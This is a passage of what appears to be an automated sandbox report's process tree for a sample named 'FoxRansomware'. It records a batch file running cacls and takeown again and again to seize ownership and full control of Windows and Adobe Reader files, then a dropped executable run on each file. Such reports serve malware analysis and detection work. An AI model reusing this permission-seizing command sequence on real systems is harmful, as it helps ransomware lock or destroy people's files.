    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:3808
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:3956
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:1444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "device.png" -nobanner
    3⤵
    PID:2272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "device.png" -nobanner
      4⤵
      PID:2500
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2316
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3384
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:2380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4160
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:2596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:2448
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:3692
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:3124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:4156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:1580
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:552
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:2304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:4120
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:3864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:4148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:4132
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:2160
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:4020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    PID:3700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:1320
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:3236
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:3420
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:1988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:3288
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3712
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:1032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    - Modifies file permissions
    PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:2100
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:3160
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  PID:1268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    PID:3164
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      PID:4224
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:4308
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4292
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:4332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:4388
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:4376
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:4428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:4468
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:4464
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:4352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:4532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:4572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:4488
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:4496
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:4612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:4684
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:4604
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:4608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:4788
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:4804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:4708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    - Modifies file permissions
    PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:4868
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:3492
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:4856
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:4936
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4952
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:4900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:5024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    PID:5040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:5012
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:5032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:5116
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- - C:\Windows\SysWOW64\cmd.exe
